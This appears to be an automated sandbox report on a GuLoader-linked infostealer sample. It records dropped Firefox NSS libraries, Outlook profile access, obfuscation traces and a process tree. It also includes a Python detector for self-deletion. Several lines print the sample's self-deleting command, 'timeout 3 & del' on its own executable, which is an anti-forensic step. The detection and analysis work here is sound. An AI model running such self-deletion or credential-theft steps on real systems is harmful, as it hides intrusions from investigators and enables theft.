Source: X4lLneI8ZK.exe, 00000011.00000003.912538712.000000001E7AC000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000000.613888707.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameKuvertbrd.exe vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe Binary or memory string: OriginalFilenameKuvertbrd.exe vs X4lLneI8ZK.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Section loaded: crtdll.dll
PE / OLE file has an invalid certificate
Source: X4lLneI8ZK.exe Static PE information: invalid certificate
Source: X4lLneI8ZK.exe Virustotal: Detection: 38%
Source: X4lLneI8ZK.exe ReversingLabs: Detection: 35%
Source: X4lLneI8ZK.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\X4lLneI8ZK.exe 'C:\Users\user\Desktop\X4lLneI8ZK.exe'
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Users\user\Desktop\X4lLneI8ZK.exe 'C:\Users\user\Desktop\X4lLneI8ZK.exe'
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Users\user\Desktop\X4lLneI8ZK.exe 'C:\Users\user\Desktop\X4lLneI8ZK.exe'
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\~DFF37CB8E8E4CDE83D.TMP
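The cmd.exe line in the process tree above is the sample's self-deletion: stall for three seconds with timeout.exe so the parent process can exit and release the lock on its own image, then del that image by name. The Python below is an added example, not taken from this report, that flags the pattern in process-creation telemetry by matching a delay-then-delete command line whose delete target is the parent's own image name. The record fields (Image, ParentImage, CommandLine) are assumed to follow Sysmon event 1 naming; the ping -n variant of the stall is an assumption about common variants rather than something this sample does; and the events are constructed to mirror the tree shown here plus one benign clean-up for contrast.

```python
# Added example: flag "timeout N & del <own image>" self-deletion in process-creation events.
# Field names follow Sysmon Event ID 1 (assumed); the events below are constructed.
import ntpath
import re
from typing import Dict, Iterable, List, Optional, Tuple

# <timeout N | ping ...> & del|erase [switches] "<file>"   (quotes may be ", ' or absent)
_DELAY_THEN_DEL = re.compile(
    r"""(?ix)
    \b(?:timeout(?:\.exe)?\s+(?:/t\s+)?\d+|ping(?:\.exe)?\s+[^&]*)   # stall first
    \s*&+\s*
    (?:del|erase)\s+(?:/[a-z]\s+)*["']?(?P<target>[^"'&]+?)["']?\s*$  # then delete
    """
)


def self_delete_target(event: Dict[str, str]) -> Optional[str]:
    """Return the deleted file name if cmd.exe is deleting its parent's own image, else None."""
    if ntpath.basename(event.get("Image", "")).lower() != "cmd.exe":
        return None
    match = _DELAY_THEN_DEL.search(event.get("CommandLine", ""))
    if not match:
        return None
    target = match.group("target").strip()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    # The del argument is normally relative to the parent's working directory,
    # so compare file names rather than full paths.
    return target if ntpath.basename(target).lower() == parent else None


def find_self_deletions(events: Iterable[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (parent image, deleted file) for every self-deletion found in the events."""
    hits = []
    for event in events:
        target = self_delete_target(event)
        if target:
            hits.append((event["ParentImage"], target))
    return hits


# Constructed events mirroring the report's process tree (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\user\Desktop\X4lLneI8ZK.exe",
     "ParentImage": r"C:\Users\user\Desktop\X4lLneI8ZK.exe",
     "CommandLine": r"'C:\Users\user\Desktop\X4lLneI8ZK.exe'"},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Users\user\Desktop\X4lLneI8ZK.exe",
     "CommandLine": r"'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe'"},
    {"Image": r"C:\Windows\SysWOW64\timeout.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"C:\Windows\system32\timeout.exe 3"},
    # Benign contrast: an installer removing a *different* file after a delay.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Setup\setup.exe",
     "CommandLine": r'cmd.exe /c timeout 3 & del "C:\Temp\setup.log"'},
]

if __name__ == "__main__":
    for parent, target in find_self_deletions(SAMPLE_EVENTS):
        print(f"self-deletion: {parent} -> del {target}")
```

Requiring the delete target to equal the parent's image name is what keeps the rule quiet on ordinary installers that use the same delay-then-delete idiom on log or temp files; loosen it to any executable path if you would rather triage those by hand.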
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@8/53@3/3
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File read: C:\Users\user\Desktop\desktop.ini
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: SELECT ALL id FROM %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_01
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A7A74107-99A69D1E-ADF8610F1
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File read: C:\Windows\System32\drivers\etc\hosts (recorded four times)
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp, mozglue.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.17.dr
Source: Binary string: ucrtbase.pdb source: X4lLneI8ZK.exe, ucrtbase.dll.17.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, freebl3.dll.17.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909646224.000000001F55C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.17.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, vcruntime140.dll.17.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914184884.000000001FF3C000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp, mozglue.dll.17.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, freebl3.dll.17.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910332025.000000001F558000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914184884.000000001FF3C000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr
Source: Binary string: msvcp140.i386.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, msvcp140.dll.17.dr
Source: Binary string: ucrtbase.pdbUGP source: X4lLneI8ZK.exe, 00000011.00000003.912538712.000000001E7AC000.00000004.00000001.sdmp, ucrtbase.dll.17.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nssdbm3.dll.17.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909646224.000000001F55C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.17.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909154010.000000001F568000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.17.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.17.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.17.dr
Source: Binary string: vcruntime140.i386.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, vcruntime140.dll.17.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nssdbm3.dll.17.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.17.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, msvcp140.dll.17.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.17.dr

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.615028324.0000000002300000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00403A43 push eax; ret 0_2_00403A44
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040546D push ebp; retf 0_2_0040546E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00403C03 push edi; iretd 0_2_00403C04
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00404CF9 push ds; iretd 0_2_00404CFD
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_004079F7 push ebx; iretd 0_2_004079F8
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02181E33 push edx; ret 0_2_02181E61
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02180218 push edx; ret 0_2_02180241
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02184A13 push edx; ret 0_2_02184A41
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02183213 push edx; ret 0_2_02183241
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02181A13 push edx; ret 0_2_02181A41
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02186214 push edx; ret 0_2_02186241
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02185A03 push edx; ret 0_2_02185A31
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02181205 push edx; ret 0_2_02181231
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02182A07 push edx; ret 0_2_02182A31
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02184207 push edx; ret 0_2_02184231
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02184233 push edx; ret 0_2_02184261
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02182A33 push edx; ret 0_2_02182A61
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02181233 push edx; ret 0_2_02181261
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02185A33 push edx; ret 0_2_02185A61
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02183A24 push edx; ret 0_2_02183A51
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02182224 push edx; ret 0_2_02182251
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02180A24 push edx; ret 0_2_02180A51
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02186A24 push edx; ret 0_2_02186A51
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02185225 push edx; ret 0_2_02185251
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02180A58 push edx; ret 0_2_02180A81
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02185253 push edx; ret 0_2_02185281
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02183A54 push edx; ret 0_2_02183A81
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02182254 push edx; ret 0_2_02182281
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02186A54 push edx; ret 0_2_02186A81
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02180248 push edx; ret 0_2_02180271
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02184A44 push edx; ret 0_2_02184A71
PE file contains sections with non-standard names
Source: msvcp140.dll.17.dr Static PE information: section name: .didat
Binary contains a suspicious time stamp
Source: api-ms-win-core-console-l1-1-0.dll.17.dr Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll
